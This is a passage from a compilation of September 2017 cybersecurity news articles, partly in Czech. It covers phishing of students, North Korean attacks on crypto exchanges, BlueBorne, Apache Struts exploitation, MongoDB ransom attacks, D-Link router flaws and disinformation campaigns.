The NCSC did not respond to SecurityWeek's inquiry over whether it now recommends that SLC and UK universities should implement DMARC. SecurityWeek also asked SLC whether it uses DMARC to protect the students, and was told, "Due to the sensitivity of the topic we wouldn't comment on the range of tools and methods that we use to counter fraud."

However, when SecurityWeek spoke to the security industry, there was less reluctance to comment. Is the same issue a problem in America? Yes, says Dan Lohrmann, chief security officer at Security Mentor -- although he hasn't seen any elevated concern yet this year (he's more concerned with Hurricanes Harvey- and Irma-related phishing scams right now).

"The back-to-school timeframe is perfect for malicious actors, as students are headed back to the classroom with their latest devices and are expecting a number of emails to be hitting their inboxes from faculty and staff," comments Jordan Wright, senior R&D engineer at Duo Security. "This scenario is just as prevalent in the US as it is anywhere else, with bogus emails purporting to have a student's grades ready for viewing, the latest assignment(s) for completion, student loan changes or simply a call to update personal information for the university's system."

"We see this type of phishing attack every year," adds Lohrmann, "especially in the Fall in 'back-to-school' season. Going after new University students with financial scams has been happening for years, and specific loan-related phishing is an ongoing challenge."

DMARC Implementation

Asaf Cidon, VP of content security at Barracuda, agrees. "Phishing is a growing problem for educational institutions. We've seen a particularly sharp increase in Office 365 account compromise attacks -- where criminals attempt to steal login credentials and ultimately gain access to launch attacks from within an organization. One customer we spoke with recently had some 200 accounts hijacked -- including the Dean and multiple faculty, students, and staff."

Should universities and related organizations (such as SLC in the UK) implement DMARC?

"Universities should absolutely implement DMARC," Cidon adds. "Universities send a wide variety of messages, often from multiple departments, alumni, and third-parties. DMARC is a great tool to prevent domain spoofing, and also to ensure deliverability of legitimate mail (which is important for EDUs looking at planned giving, recruitment, and other activities)."

DMARC is, however, complex to implement. Martin Zinaich, information security officer for the City of Tampa, told SecurityWeek, "it goes a long way to reducing spoofed messages (which is usually how an account gets compromised in the first place). But," he added, "even dmarc.org recognizes that fully deploying this framework is not easy: 'Many senders have a complex email environment with many systems sending email, often including 3rd party service providers. Ensuring that every message can be authenticated using SPF or DKIM is a complex task, particularly given that these environments are in a perpetual state of flux.'"

Alan Levine, a security advisor to phishing specialist Wombat, adds, "DMARC does help in terms of domain authentication, but it is not close to a panacea. Any attacker with a particular target will register a 'like' domain, something close to and almost indiscernible from the targeted organization's domain. Then, DMARC won't help, because the domain will appear legit, even though the mission is malicious."

So, while the first step would be to implement DMARC, an important second step would be to seek control over potential look-alike domains that could be used as phishing sites. While this is in progress, users such as students will remain vulnerable. At this point, security awareness training is an important option.

"Universities should create internal awareness and education programs within their institution," says Wright. "Teaching users how to spot, report and prevent phishing attacks and emails can be a great way to reduce the risk of falling prey to such attacks. Universities can assist this by setting up dedicated web pages that flag ongoing phishing attacks for students and, whenever a phishing attack is detected as targeting their university, the IT Team can send out alerts for students."

But there is an important addendum to this. While this phishing scam is targeted against students, student loan organizations and universities, nobody and no organization is ignored by the scammers.

"Young and old alike," explains Tim Ayling, a fraud and risk intelligence director at RSA Security, "the public needs to have greater awareness of spoofing attacks and take better care to protect themselves online. Much of this comes down to basic security hygiene. Our advice would be: first and foremost, avoid clicking on links to websites from emails and any unknown sources. If in any doubt, search for the website using an engine -- particularly in cases like this where the email would've come from a random email alias, with a generic introduction that suggests it was sent to others. Secondly, the devil is in the detail. Always be sure to check the URL of a site that you are visiting to make sure that it is correct -- often spoofed sites have typos in their address that will give clues that it is not official. Lastly, check the address bar to ensure you are visiting a secure site and there are no warnings."

It's not just Freshers who get phished.


North Korean Hackers Targeting Crypto-Currency Exchanges: FireEye

12.9.2017 securityweek BigBrothers
Over the past several months, threat actors believed to have ties with North Korea have been targeting crypto-currency exchanges to obtain hard currencies for the Pyongyang regime, FireEye says.

The attacks, which FireEye has observed since May 2017, are said to be part of a campaign that started in 2016, when banks and the global financial system were hit. Given the impressive spike in value Bitcoin has seen since the beginning of the year, it’s no surprise that threat actors are interested in the potential crypto-currencies have.

Traditionally, North Korean actors have been engaging in activities typically associated with nation-state cyber espionage, but they started shifting focus to conduct cybercrime as of last year. Given the country’s position as a pariah nation that has been cut off from much of the global economy, as well as its tight control of its military and intelligence capabilities, this doesn’t come as a surprise.

North Korea Stealing Bitcoin via hacksAs such, the recently observed interest in crypto-currencies isn’t surprising either, and FireEye considers the recent attacks to be part of a larger campaign that started last year. Since May 2017, the security researchers have observed North Korean actors targeting at least three South Korean crypto-currency exchanges, supposedly in an attempt to steal funds.

The attacks, FireEye says, involved spear-phishing attacks that often targeted the personal email accounts of employees at digital currency exchanges. Tax-themed lures were frequently employed to trick users into installing malware such as PEACHPIT and similar variants, which have been previously linked to North Korean actors.

The spear-phishing attacks started in early May and targeted one crypto-currency exchange at a time. By early June, three South Korean exchanges were hit, along with various other, unknown victims, which the security researchers suggest might be crypto-currency service providers in South Korea.

“Add to that the ties between North Korean operators and a watering hole compromise of a Bitcoin news site in 2016, as well as at least one instance of usage of a surreptitious crypto-currency miner, and we begin to see a picture of North Korean interest in crypto-currencies, an asset class in which Bitcoin alone has increased over 400% since the beginning of this year,” FireEye notes.

Prior to these attacks, South Korean crypto-currency exchange Yapizon was compromised in April, but FireEye says that “at least some of the tactics, techniques, and procedures” reportedly employed during this incident were different, and there are no clear indications of North Korean involvement.

At the end of April, however, the United States announced a strategy of increased economic sanctions against North Korea, and the subsequent attacks on South Korean exchanges might be the result of this announcement. A July attack on Bithumb might also be the result of North Korea’s increased interest in Bitcoin, a report published last month revealed.

The targeting of Bitcoin and crypto-currency exchanges fits with the previously observed North Korean actors’ interest in conducting financial crime on the regime’s behalf. By compromising a crypto-currency exchange, the actors can move crypto-currencies out of online wallets, swap them for more anonymous ones, and even “send them directly to other wallets on different exchanges to withdraw them in fiat currencies such as South Korean won, US dollars, or Chinese renminbi,” FireEye notes.

“As the regulatory environment around cryptocurrencies is still emerging, some exchanges in different jurisdictions may have lax anti-money laundering controls easing this process and make the exchanges an attractive tactic for anyone seeking hard currency,” the researchers continue.

Nation states are starting to take notice of the potential presented by Bitcoin and other crypto-currencies, given their recent increase in value. Thus, this emerging asset class is becoming a “target of interest by a regime that operates in many ways like a criminal enterprise,” FireEye notes, adding that other rising cyber powers might follow a similar path.

“Cyber criminals may no longer be the only nefarious actors in this space,” the researchers conclude.

Just last night, the UN Security Council voted unanimously to adopt new sanctions on North Korea, including restrictions on oil shipments, banning import and export of textiles, and barring countries from issuing new work permits to North Koreans working abroad.


Brute Force 900k + Attempts on a New Server
12.9.2017 securityaffairs Attack

Brute Force Attack Report – This article is going to cover an attack we have had on a new network from the second it was connected to the internet.
Instantly we were collecting data showing the determination of people trying to gain “root” access to our Server.

Our data shows us that on the 21/August/2017 we had 150,000 failed logon attempts

We will start by describing the attack type and potential risk involved.

Attack TYPE
Brute force attack, SSH service authentic action attack

Brute force (also known as brute force cracking) is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.

Attempts graph at the time of this report.

Brute force attack 1

Failed Logins – Failed Logins. Last 150 Events

Attack Origins
As shown in the chart below 27.1% of the attacks including the 1st IP to attempt SSH access was from China closely followed by Russia via a botnet attack.

Brute force attack 2

Duration of The Attack
This attack started on 19/08/2017 and is still ongoing at over 20k attempts per day (Please note this attack is being monitored 24/7 by Frontline Cyber Security Ltd and is against one of our test servers using honey pots).

We are sharing this information we are gathering with Action Fraud to help people detect and defend against future attacks from the target IP addresses.

Further details on this attack can be found on our Open Threat Exchange profile via the link below.

https://otx.alienvault.com/pulse/5999a448c8f3d01e51964283/

Risk to Business Explained
If this attack was to target your company servers the risks are very high depending on your password strength and server security see below (with speed of 1,000,000,000 Passwords/sec, cracking an 8-character password composed using 96 characters takes 83.5 days. But a recent research presented at Password^12 in Norway, shows that 8-character passwords are no safer. They can be cracked in 6 hours)

If they crack your root – admin password they essentially control your server so please ensure you have protection in place for example:

Rate Limiting the Login Attempts

Hiding the login page

Using htaccess

Hardware Firewall / IP Tables

Two-factor authentication enabled.


Billions of Devices Potentially Exposed to New Bluetooth Attack

12.9.2017 securityweek Vulnerebility
Billions of Android, iOS, Windows and Linux devices that use Bluetooth may be exposed to a new attack that can be carried out remotely without any user interaction, researchers warned.

Armis Labs, a company that specializes in protecting Internet of Things (IoT) devices, has discovered a total of eight Bluetooth implementation vulnerabilities that expose mobile, desktop and IoT systems to an attack it has dubbed “BlueBorne.”

According to the security firm, the attack only requires Bluetooth to be enabled on the targeted device – no pairing is needed between the victim and the attacker’s device, and the Bluetooth connection does not even have to be discoverable.BlueBorne Bluetooth attack

A hacker who is in range of the targeted device can exploit one of the several Bluetooth implementation vulnerabilities that can lead to remote code execution, information disclosure or man-in-the-middle (MitM) attacks. The attacker only needs to determine what type of operating system the target is using in order to deploy an exploit specific to that platform.

BlueBorne does not require the targeted user to click on a link or open a file, and the malicious activities can take place in the background, making it less likely for the victim to notice anything suspicious. And since the attack leverages Bluetooth, a less common attack vector, many security solutions may not detect the malicious activity, Armis said.

The flaws can be exploited by malicious actors to deliver ransomware and other types of malware. Armis claims the technique can also be used to create a worm that spreads from one device to another via Bluetooth:

Armis showed that an attacker can also exploit one BlueBorne vulnerability to launch MitM attacks against Windows machines and redirect the victim’s browsing session to a phishing website. Another video shows a hacker taking control of a Samsung smartwatch running a Linux-based Tizen operating system and eavesdropping on its owner.

Vulnerabilities that allow BlueBorne attacks have been found in several implementations of Bluetooth, including in Windows, Android, Linux and iOS. Experts discovered information disclosure and code execution flaws in Linux; one vulnerability that allows MitM attacks in Windows (CVE-2017-8628); four code execution, MitM and information disclosure vulnerabilities in Android (CVE-2017-0781, CVE-2017-0782, CVE-2017-0783 and CVE-2017-0785); and one code execution flaw in the Bluetooth Low Energy Audio protocol used by iOS.

Google patched the weaknesses in Android with its September security updates and Microsoft is expected to release fixes for Windows on Tuesday. Apple has already addressed the vulnerabilities with the release of iOS 10 (one year ago) and Apple TV 7.2.2. Earlier versions of the Apple operating systems are still vulnerable to attacks.

The developers of Linux distributions have also been notified and are also said to be working on patches.

Armis has released some technical details about each of the vulnerabilities, but it will only make the exploits available at a later date.


Apache Struts Flaw Increasingly Exploited to Hack Servers

12.9.2017 securityweek Vulnerebility
Security firm Imperva has detected thousands of attacks attempting to exploit a recently patched remote code execution vulnerability affecting the Apache Struts 2 open source development framework.

The security hole, tracked as CVE-2017-9805, affects applications that use the REST plugin with the XStream handler for XML payloads, and it exists due to the way Struts deserializes untrusted data. An exploit was made available within hours after a patch was released.

A few days later, Cisco Talos and Belgium-based NVISO Labs reported seeing exploitation attempts in the wild. However, a majority of the attacks only aimed to find vulnerable servers.

Imperva’s systems have blocked thousands of attacks, and the company says roughly 80% of them attempted to deliver a malicious payload, rather than just trying to determine if a server is vulnerable.

Roughly two-thirds of the attacks seen by the company involved Wget, a utility designed for downloading files. The list of payloads also included the /bin/sh system shell, the dig network administration tool, the cURL data transfer tool, and the certificate services program Certutil.

The biggest attack source was China, with a single Chinese IP sending out more than 40% of all the requests. The IP address in question is registered to a Chinese e-commerce company and experts believe the attackers may have compromised one of its devices. Attacks also came from Australia, the United States, Brazil, Canada, Russia and various European countries.

In many cases, cybercriminals executed commands to retrieve a malicious payload that would allow them to take control of the targeted server and abuse it for distributed denial-of-service (DDoS) and other attacks.

Cisco checking products for Apache Struts vulnerability

Several vulnerabilities have been patched in Apache Struts 2 this month and Cisco has started checking its products in order to determine which of them may be exposed to attacks.

While there are some products still under investigation, CVE-2017-9805 has so far been found to impact the company’s MXE 3500 Series Media Experience Engines, Unified Contact Center Enterprise, Unified Intelligent Contact Management Enterprise, and Network Performance Analysis.

A less severe remote code execution flaw patched in Apache Struts 2 last week, CVE-2017-12611, has been found to affect Cisco Digital Media Manager, Hosted Collaboration Solution for Contact Center, Unified Contact Center Enterprise, and Unified Intelligent Contact Management Enterprise.

Apache Struts flaw blamed for Equifax breach

According to some reports, the recent Equifax breach, which affects roughly 143 million consumers in the United States, involved an Apache Struts vulnerability.

While some have jumped to conclude that the flaw in question could be CVE-2017-9805, a more likely scenario is that attackers leveraged CVE-2017-5638, a vulnerability exploited in the wild since March. Equifax has yet to confirm that a Struts flaw was in fact used in the operation targeting its systems.


MongoDB Tightens Security Amid New Database Attacks

12.9.2017 securityweek Attack
A new series of ransomware attacks targeting MongoDB databases has prompted the company to implement new data security measures.

The new attacks follow a similar pattern to the MongoDB ransack campaign unleashed at the end of 2016 and beginning of 2017, when more than 33,000 MongoDB databases fell to the massacre within weeks. By mid-January, attackers began targeting Hadoop and CouchDB databases, though the campaign didn’t claim as many victims.

Cybercriminals were targeting poorly secured databases that were exposed to the Internet and allowed them to log in and wiped them clean, while leaving ransom notes behind. Attackers claimed to have copied the content of the databases before wiping them, but researchers such as Victor Gevers, chairman of the GDI Foundation, discovered that the attackers didn’t exfiltrate data, but simply erased it.

Three new hacking groups started hitting the MongoDB databases by the end of summer. By September 2, after less than a week of activity, the groups ransacked a total of over 26,000 databases. One group alone claimed over 22,000 of the attacks.

The new incidents, however, don’t represent a new risk, but merely show that hackers have found new targets, MongoDB says. Hackers are targeting misconfigured and unmaintained MongoDB deployments, just as before.

If left exposed to the Internet and without the proper security in place, these databases are bound to fall. Some were left connected to the Internet with no password to the admin account, MongoDB notes in a blog post.

To reduce the chance that databases are deployed insecurely, MongoDB has decided to make new changes in upcoming releases. The database software maker has already made localhost binding the default configuration (in most popular deployment package formats, RPM and deb) since version 2.6.0, meaning that all networked connections need to be explicitly configured by an administrator.

“Beginning with development release version 3.5.7, localhost-only binding is implemented directly in the MongoDB server, making it the default behavior for all distributions. This will also be incorporated into our upcoming production-ready 3.6 release,” the company says.

Victor Gevers, who has been long advocating for the inclusion of additional security features in MongoDB, has confirmed to SecurityWeek that version 3.6 will include “long awaited improvement for security which prevent unsafe default deployments.”

He also revealed that, in the new attacks, some of the databases have been hit multiple times after their admins restored the data but didn’t fix the actual problem. According to him, however, only deployments that are discoverable via open source intelligence are being targeted.

“There are attacks going on at a small scale against the machines that were already hit. New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don't scan themselves but simply use OSINT,” Gevers said.

There have been nearly 76,000 such attacks registered to date, as per a Google Docs spreadsheet maintained by Gevers, Niall Merrigan, and others. The researchers have been working hard helping victims, but they usually do voluntary work: “But don't forget we are doing this work as volunteers. We are expected to be the last resort and failure is not an option,” Gevers said.

During the first series of attacks in early January, the researchers helped 126 victims, including organizations that represented the “most horrifying data losses I have seen in my entire career,” Gevers said. One incident, he pointed out, involved the leak of data pertaining to hundreds of thousands of patients.

The issue, the researcher argues, is that many organizations aren’t even aware of the fact that they have been breached: “Awareness is an issue which needs to be addressed over and over again. I think the GDPR is going to help with that,” he said.

“Most people have no clue what they are doing. We see across all great (open source) products. From CouchDB, Redis, ElasticSearch, Hadoop HDFS, Jenkins, etc, etc. DevOPS have increased the amount of this kind of data leaks significantly in the last 5/6 years,” Gevers also said.


MongoDB improves security amid new wave of ransom-attacks
12.9.2017 securityaffairs Ransomware

MongoDB company implements new data security features in response to the recent wave of ransom attacks that hit installations worldwide.
You have to admit that the bad actors are very good at leveraging a vulnerability into a lucrative opportunity. The latest example comes from MongoDB, a popular, open source database commonly deployed for big data applications on the Internet.

The default installation for older versions of MongoDB did not force basic security controls such as a password for the administration account. Installed behind firewalls in a “traditional” data center configuration, the default installation is bad practice, but not necessarily a significant risk. Layers of protection mitigate the missing controls.

Unfortunately, many cloud hosting providers allow easy installation of MongoDB making it directly accessible from the Internet by default without a simple way to setup the security controls. Strip away layered security controls and do not force basic configuration security and you have a recipe for disaster.

“The most open and vulnerable MongoDBs can be found on the AWS platform because this is the most favorite place for organizations who want to work in a devops way,” Victor Gevers told Bleeping Computer. “About 78 percent of all these hosts were running known vulnerable versions.”

In December 2016, one bad actor started compromising vulnerable MongoDB databases. Contents were downloaded and replaced by a ransom note demanding payment in exchange for a return of the missing data. By January, many hacking groups were involved and over 20,000 vulnerable MongoDB installations were compromised. With that many groups in competition, databases were compromised multiple times and ransom notes from one group were replaced by ransom notes from another group. It was unclear for victims who had their missing data and who the ransom should be paid to. Victims paying the ransom were unlikely to get their data back.

After this flurry of activity in the first few months of 2016, the number of MongoDB attacks quieted over the Summer. Perhaps the victims had learned their lessons? Maybe they accepted their fate and couldn’t be ransomed again? Maybe the bad actors were taking the Summer off to spend their ill gotten gains? What we do know is that there are still thousands of vulnerable databases. Attacks against MongoDB databases picked up again in September — at a much faster pace. “[it] took attackers from the first wave of MongoDB attacks nearly a month to rack up 45,000 ransomed DBs. The Cru3lty group managed [22,000] only last week.”

MongoDB ransom attacks.jpg

Obviously, the bad actors have figured out how to script the attacks, but how do they find the targets? The same way most vulnerable systems are found on the Internet, SHODAN. The self-described “search engine for Internet-connected devices” is an easy place to find Internet of Things (IoT) devices. A great place to identify vulnerable web cams, refrigerators, industrial control systems (ICS), web apps and databases. If it is connected to the Internet you can find it in SHODAN. Once you know how to identify vulnerable MongoDB installations, add some scripting magic, exploit, ransom and repeat.

“New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don’t scan themselves but simply use OSINT,” said Victor Gevers, chairman of the GDI Foundation. One of the lead researchers tracking the ongoing exploits.

With all of the media coverage and the number of people affected at the beginning of the year, you might expect that everyone has checked and protected their MongoDB installations. But that is obviously not the case. According to a Google Docs spreadsheet maintained by the researchers, the count of compromised databases is almost 76,000. Obviously, the people installing MongoDB aren’t putting in the effort to secure their installations so the MongoDB team is changing their default installs to be more secure. If you are responsible for an existing MongoDB installation, you should check out the official MongoDB Security Checklist to ensure you are protected.


Spain – Facebook slapped with €1.2M fine for violating data protection regulations
12.9.2017 securityaffairs Privacy

The Spanish Data Protection Agency (AEPD) has issued a €1.2 Million fine against Facebook for violating data protection regulations.
Other privacy problems for the tech giant Facebook, the company has been fined for a series of privacy violations in Spain.

The Spanish Data Protection Agency (AEPD) has issued a €1.2 Million fine against Facebook for violating data protection regulations.
According to the AEPD, the social network giant collects users’ personal data without informed and ‘unequivocal consent’ for commercial purposes. It is sharing the data with advertisers and marketers without informing users, the company collects sensitive data on user’s ideology, religious beliefs, sex and personal tastes and navigation.

“The Agency notes that the social network collects, stores and uses data, including specially protected data, for advertising purposes without obtaining consent.

The data on ideology, sex, religious beliefs, personal preferences or browsing activity are collected directly, through interaction with their services or from third party pages without clearly informing the user about how and for what purpose will use those data” states the AGDP.

“Facebook does not obtain unambiguous, specific and informed consent from users to process their data, since the information it offers is not adequate”
The list of violations continues, Facebook doesn’t totally cancel information when no longer needed for the purpose they were collected.

The Spanish Agency considered identified two serious and one very serious infringements of the Data Protection Law and imposes on the company a sanction of 1,200,000 euros.

Facebook privacy
The AEPD fined Facebook for €600,000 due to a “very serious” infringement, while the remaining two serious violations are:
Tracking people through the use of “Like” button social plug-ins embedded in other non-Facebook web pages (FB slapped with €300,000).
Failing to delete data collected from users once it has finished using it (FB slapped €300,000).
The AEPD accuses Facebook of using a privacy policy containing “generic and unclear terms,” and that doesn’t “adequately collect the consent of either its users or nonusers, which constitutes a serious infringement.”

Below the reply of Facebook to the accusations:
“We take note of the DPA’s decision with which we respectfully disagree. Whilst we value the opportunities we’ve had to engage with the DPA to reinforce how seriously we take the privacy of people who use Facebook, we intend to appeal this decision.”
“As we made clear to the DPA, users choose which information they want to add to their profile and share with others, such as their religion. However, we do not use this information to target adverts to people.” states Facebook.

In May, the company was fined €150,000 because the techniques used to target advertising and track users.


MongoDB Tightens Security Amid New Database Attacks

11.9.2017 securityweek Attack
A new series of ransomware attacks targeting MongoDB databases has prompted the company to implement new data security measures.

The new attacks follow a similar pattern to the MongoDB ransack campaign unleashed at the end of 2016 and beginning of 2017, when more than 33,000 MongoDB databases fell to the massacre within weeks. By mid-January, attackers began targeting Hadoop and CouchDB databases, though the campaign didn’t claim as many victims.

Cybercriminals were targeting poorly secured databases that were exposed to the Internet and allowed them to log in and wiped them clean, while leaving ransom notes behind. Attackers claimed to have copied the content of the databases before wiping them, but researchers such as Victor Gevers, chairman of the GDI Foundation, discovered that the attackers didn’t exfiltrate data, but simply erased it.

Three new hacking groups started hitting the MongoDB databases by the end of summer. By September 2, after less than a week of activity, the groups ransacked a total of over 26,000 databases. One group alone claimed over 22,000 of the attacks.

The new incidents, however, don’t represent a new risk, but merely show that hackers have found new targets, MongoDB says. Hackers are targeting misconfigured and unmaintained MongoDB deployments, just as before.

If left exposed to the Internet and without the proper security in place, these databases are bound to fall. Some were left connected to the Internet with no password to the admin account, MongoDB notes in a blog post.

To reduce the chance that databases are deployed insecurely, MongoDB has decided to make new changes in upcoming releases. The database software maker has already made localhost binding the default configuration (in most popular deployment package formats, RPM and deb) since version 2.6.0, meaning that all networked connections need to be explicitly configured by an administrator.

“Beginning with development release version 3.5.7, localhost-only binding is implemented directly in the MongoDB server, making it the default behavior for all distributions. This will also be incorporated into our upcoming production-ready 3.6 release,” the company says.

Victor Gevers, who has been long advocating for the inclusion of additional security features in MongoDB, has confirmed to SecurityWeek that version 3.6 will include “long awaited improvement for security which prevent unsafe default deployments.”

He also revealed that, in the new attacks, some of the databases have been hit multiple times after their admins restored the data but didn’t fix the actual problem. According to him, however, only deployments that are discoverable via open source intelligence are being targeted.

“There are attacks going on at a small scale against the machines that were already hit. New MongoDB instances which are not indexed by the famous search engine Shodan are not being hit. This means some groups don't scan themselves but simply use OSINT,” Gevers said.

There have been nearly 76,000 such attacks registered to date, as per a Google Docs spreadsheet maintained by Gevers, Niall Merrigan, and others. The researchers have been working hard helping victims, but they usually do voluntary work: “But don't forget we are doing this work as volunteers. We are expected to be the last resort and failure is not an option,” Gevers said.

During the first series of attacks in early January, the researchers helped 126 victims, including organizations that represented the “most horrifying data losses I have seen in my entire career,” Gevers said. One incident, he pointed out, involved the leak of data pertaining to hundreds of thousands of patients.

The issue, the researcher argues, is that many organizations aren’t even aware of the fact that they have been breached: “Awareness is an issue which needs to be addressed over and over again. I think the GDPR is going to help with that,” he said.

“Most people have no clue what they are doing. We see across all great (open source) products. From CouchDB, Redis, ElasticSearch, Hadoop HDFS, Jenkins, etc, etc. DevOPS have increased the amount of this kind of data leaks significantly in the last 5/6 years,” Gevers also said.


Expert disclosed 10 zero-day vulnerabilities in D-Link DIR 850L wireless routers
11.9.2017 securityaffairs Vulnerebility

The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in D-Link DIR 850L routers and invites users to stop using them.
The security researcher Pierre Kim has discovered ten critical zero-day vulnerabilities in routers from networking equipment manufacturer D-Link that open owners to cyber attacks.
The flawed devices are the D-Link DIR 850L wireless AC1200 dual-band gigabit cloud routers, the list of vulnerabilities includes the lack of proper firmware protection, backdoor access, command injection attacks resulting in root access and several cross-site scripting (XSS) flaws.

An attacker could exploit the vulnerabilities to intercept traffic, upload malicious firmware, and get full control over the affected routers.

Kim sustains that “the D-Link DIR 850L is a router overall badly designed with a lot of vulnerabilities. Basically, everything was pwned, from the LAN to the WAN. Even the custom MyDlink cloud protocol was abused.”

“Basically, everything was pwned, from the LAN to the WAN. Even the custom MyDlink cloud protocol was abused.” wrote Kim in a blog post.

This isn’t the first time Kim spots flaws in D-Link products, in October 2016 he reported multiple vulnerabilities in D-Link DWR-932B LTE router, but the Taiwan-based firm ignored them.

For this reason, the experts this time decided to publicly disclose the zero-day vulnerabilities hoping that the company will fix them.
At the time, users are invited avoid using the affected D-Link router in order to be safe from such attacks.
“I advise to IMMEDIATELY DISCONNECT vulnerable routers from the Internet.” Kim wrote.

Router D-Link DIR 850L

Below the list of zero-day vulnerabilities disclosed by Kim that affect D-Link DIR 850L revision A and revision B:
Lack of proper firmware protection—the firmware images are not protected, an attacker could upload a malicious firmware version to the device and compromise it. While firmware for D-Link 850L RevA has no protection, the firmware for D-Link 850L RevB is protected with a hardcoded password.
Cross-site scripting (XSS) Flaws—both LAN and WAN of D-Link 850L RevA is vulnerable to “several trivial” XSS vulnerability, allowing an attacker “to use the XSS to target an authenticated user in order to steal the authentication cookies.”
Retrieve admin passwords—both LAN and WAN of D-Link 850L RevB are vulnerable, an attacker can retrieve the admin password and use the MyDLink cloud protocol to add the user’s router to the attacker’s account to gain full access to the device.
Weak cloud protocol— both D-Link 850L RevA and RevB. are vulnerable. MyDLink protocol works via a TCP tunnel that use no encryption at all to protect communications between the victim’s router and the MyDLink account.
Backdoor Access—D-Link 850L RevB routers have backdoor access via Alphanetworks, an attacker can get a root shell on the device.
Private keys hardcoded in the firmware—the private encryption keys are hardcoded in the firmware of both D-Link 850L RevA and RevB. An attacker could extract them to perform man-in-the-middle attacks.
No authentication check—An attacker could alter the DNS settings of a D-Link 850L RevA router via non-authenticated HTTP requests and hijack the traffic.
Weak files permission and credentials stored in cleartext—local files are exposed in both D-Link 850L RevA and RevB. Credentials are stored in clear text.
Pre-Authentication RCEs as root—the internal DHCP client running on D-Link 850L RevB routers is vulnerable to several command injection attacks, allowing attackers to gain root access on the affected devices.
Denial of Service (DoS) Flaw—An attacker could crash some daemons running in both D-Link 850L RevA and RevB remotely via LAN triggering DoS conditions.
Below the report timeline:
Jun 15, 2017: Vulnerabilities found.
Jul 03, 2017: This advisory is written.
Sep 08, 2017: A public advisory is sent to security mailing lists.


Přichází DaaS, dezinformace jako služba

11.9.2017 SecurityWorld BigBrother
Počítačová propaganda se může z politiky brzy přesunout do byznysu.

Facebook zveřejnil závěry vnitřního vyšetřování, které odhalilo 470 falešných účtů a stránek navázaných na ruskou „trollí farmu“, která během posledních amerických prezidentských voleb nakoupila 3 300 facebookových reklam za zhruba 100 tisíc dolarů.

Dále pak Facebook zjistil 2 200 reklam pořízených z amerických účtů, u nichž však byl jazyk nastaven na ruštinu. Všechny byly politického charakteru a oslovily mezi 23 a 70 miliony uživatelů.

Za touto kampaní podle všeho stojí ruská společnost, která se dle dva roky starého článku v The New York Times, specializuje na „umění trollingu“. Své zaměstnance vyplácí dle schopností „trollit“ a dokonce jim zajišťuje i kurzy angličtiny, aby na západě působili věrohodněji.

Společnost v minulosti známá jako Internet Research Agency (dnes zaštiťující své aktivity pod názvy Glavset či Federal News Agency) údajně provozuje šestnáct propagandistických webů a zaměstnává přes dvě stě redaktorů. Mužem, který za ní stojí, je jistý Jevgenij Prigožin, podnikatel a restauratér, který tak krom svých kuchařských schopností začal nabízet doslova i desinformaci-jako-službu - DaaS.

The New York Times ve společnosti s bezpečnostní agenturou FireEye zjistili, že jeho společnosti vytvořily na sociální síti až tisíce „falešných Američanů“ snažících se na internetu ovlivnit volební diskuze. Vítejte ve světě počítačové propagandy!

Do této propagandy můžeme zahrnout využití automatizace, botnetů, algoritmů, big data a umělé inteligence za účelem ovlivnit veřejné mínění prostřednictvím internetu. Často přitom útočí na mainstreamová média, která označuje za lživá a nedůvěryhodná, což ve výsledku oslabuje důvěru veřejnosti v demokratické instituce.

Už dnes je obtížné se proti takové propagandě bránit, podle odborníků to však v brzké budoucnosti bude ještě větší výzva a dá se očekávat, že dezinformace brzy infiltruje i multimediální obsah.

Vývojáři z univerzity ve Washingtonu už například za pomocí AI vytvořili falešné video, na němž bývalý prezident USA Barack Obama říkal věci, které nikdy neřekl. Vědci ze Stanfordu pro změnu vyvinuli nástroj, jemuž říkají Face2Face, vytvářející taková falešná videa v reálném čase...

Snadno si tak lze představit například telefonáty či rovnou videohovory s podvodníky vydávající se za jiné, ať už to bude v novinářské praxi nebo jakémkoliv jiném zaměstnání.

Každá akce však má i svou reakci a je tak pravděpodobné, že oblast IT bezpečnosti se v nedaleké budoucnosti začne namísto ochrany informace jako takové zaměřovat na ochranu její pravdivosti. A nejde jen o politiku, dezinformační kampaně mohou mít tvrdý dopad i na byznys.

Představme si situaci, kdy se v politice zástupci jedné ideologie snaží pošpinit své protějšky, v obchodu. Tehdy by výrobce namísto vychvalování kvalit svého produktu A raději podkopával reputaci konkurence a útočil tak na produkt B.

Pomocí facebookových analýz by mohl vytipovat potenciální kupce produktu B, zpracovat si jejich psychologický profil a následně je atakovat příspěvky falešných uživatelů sdílejících falešné zprávy poškozující právě produkt B.

To vše by přitom zvládla AI, schopná vytvořit například i zmíněný falešný multimediální obsah, a ještě k tomu na zakázku jako DaaS – dezinformaci jako službu. Z dezinformace se stává nový byznys. A ne malý.


Místo bomby počítač. Hrozí kybernetické 11. září, varují experti 16 let po útocích
11.9.2017 ČT24 BigBrother
Od newyorských útoků v roce 2001 se taktika teroristů změnila. Zbraní jsou častěji i počítače, radikální skupiny proto mají své hackerské sekce. Experti z poradního orgánu prezidenta USA varují, že hrozí kybernetický útok v rozsahu toho z 11. září, který může cílit na kritickou infrastrukturu včetně elektráren. A Spojené státy na to prý nejsou připravené. Odborníci proto vyzývají k vytvoření zvláštních komunikačních sítí a sdílení citilivých informací mezi vládou a soukromými provozovateli infrastruktury.

Diplom z kyberbezpečnosti: Školy začínají vychovávat experty na počítačovou bezpečnost
Koordinované útoky v New Yorku, na Pentagon a v Pensylvánii, kde atentátníky přemohli pasažéři letadla, si vyžádaly před šestnácti lety skoro tři tisíce obětí. Za tragédií stáli radikálové z Al-Káidy, kteří od té doby s každým blížícím se výročím nabádají své stoupence k dalším akcím.
V posledních letech těží ze strachu nejen Američanů i takzvaný Islámský stát (IS), který s tím, jak přichází o území na Blízkém východě, stupňuje útoky na Západě.

IS byl vůbec první teroristickou skupinou, která zavedla zvláštní hackerskou divizi. Pirátům sympatizujícím s radikály se už podařilo mimo jiné provést útok na sociální média Centrálního velení USA (CENTCOM). Radikálové se zmocnili jeho účtu na Twitteru i YouTube.


15 let od zkázy Dvojčat. Amerika je pořád zranitelná, invaze v Afghánistánu islamisty nezastavila
Před dvěma lety před výročím 11. září IS zveřejnil video, v němž hrozil USA novými útoky a ukázal členy kybernetické divize včetně lidí přezdívaných „Virus Sýrie“, „Doktor ISIS“ nebo „Hacker Aldmar“. Skupiny spřízněné s IS jako Islámská kybernetická armáda či Hackeři chalífátu tehdy spustily hashtag „America Under Hacks“.

